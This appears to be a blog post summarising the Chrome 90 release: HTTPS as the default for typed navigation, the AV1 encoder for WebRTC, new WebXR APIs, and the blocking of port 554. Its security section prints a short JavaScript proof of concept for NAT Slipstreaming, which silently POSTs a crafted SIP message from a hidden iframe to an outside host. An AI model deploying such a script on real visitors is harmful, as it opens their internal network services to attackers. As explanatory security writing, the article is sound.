What’s New in Chrome 90? HTTPS Default, AV1 Encoder, WebXR & Security Updates

TL;DR

Chrome 90 release date: 2021-04-13

Number of new features: 23 (see Chrome Platform Status for details)

V8 engine version: v9.0

Biggest highlight: default use of HTTPS protocol (still in gradual rollout)

Other interesting features are listed below

A safer default for navigation: HTTPS

Starting with Chrome 90, the browser defaults to opening URLs with HTTPS, changing the classic interview question about what happens after entering a URL.

Previously, entering example.com would first request http://example.com and rely on server redirects. Chrome 90 now directly requests https://example.com.

Testing with kiwenlau.com shows that Chrome 89 initially uses HTTP and receives a 301 redirect, while Chrome 90 still makes the first request over HTTP due to the feature being in a gray‑scale rollout.

To enable the feature manually, go to chrome://flags and set #omnibox-default-typed-navigations-to-https to "Enabled".

Using HTTPS prevents clear‑text transmission, protecting against eavesdropping and tampering, which is fundamental for web security.

AV1 Encoder

AV1 (AOMedia Video 1) is an open, royalty‑free video codec offering 20‑30% better compression than VP9. Major players like Netflix, Facebook, iQIYI, and YouTube’s custom VCU chip support AV1.

For video‑heavy applications, AV1 reduces bandwidth costs dramatically; iQIYI’s 2020 report shows bandwidth expenses accounting for over a third of its losses.

Chrome 90 adds an AV1 encoder for WebRTC, improving compression efficiency, enabling lower‑bitrate video (as low as 30 kbps), and enhancing screen‑sharing performance.

WebXR Depth API and WebXR AR Lighting Estimation

These new WebXR features let developers obtain depth information between the device and real‑world objects and estimate ambient lighting for AR experiences.

WebXR is the API for building AR/VR applications on the web. Example demos such as Sodar (measuring social distance) illustrate its capabilities.

Feature: Block HTTP port 554

Chrome 90 blocks port 554 to mitigate NAT Slipstreaming 2.0 attacks, which allow attackers to bypass local firewalls and reach internal services.

The attack works by embedding malicious JavaScript that crafts a large POST request, causing a NAT device to interpret one of the TCP packets as a SIP REGISTER packet, opening a public port to the attacker’s internal target.

Below is a simplified example of the JavaScript used to trigger the NAT behavior:

// our sip message
var sipmsg = 'REGISTER sip:samy.pl;transport=TCP SIP/2.0
' +
             'Contact: <sip:[email protected]:1234;transport=TCP>

';

// load form in an iframe so user doesn't see it
var iframe = document.createElement('iframe');
iframe.name = 'iframe';
iframe.style.display = 'none'; // hide the iframe

// create form
var form = document.createElement('form');
form.setAttribute('target', 'iframe'); // load into iframe
form.setAttribute('method', 'POST'); // need the POST area where we can add CRLFs
form.setAttribute('action', 'http://samy.pl:5060'); // "http" server on SIP port 5060
form.setAttribute('enctype', 'multipart/form-data'); // ensure our data doesn't get encoded

var textarea = document.createElement('textarea');
textarea.setAttribute('name', 'textname'); // required
textarea.innerHTML = sipmsg;
form.appendChild(textarea);

document.body.appendChild(iframe);
document.body.appendChild(form);
form.submit();

Blocking the port prevents the immediate exploit, but a comprehensive solution requires proper NAT configuration and strict device passwords.

Summary

The most significant update in Chrome 90 is the default HTTPS navigation, a small yet impactful change that moves the web away from clear‑text HTTP. Additional highlights include the AV1 encoder for WebRTC, new WebXR APIs, and security measures like blocking port 554 to curb NAT Slipstreaming attacks.

While some features may not be immediately useful to all developers, understanding them provides a broader view of modern front‑end capabilities and security considerations.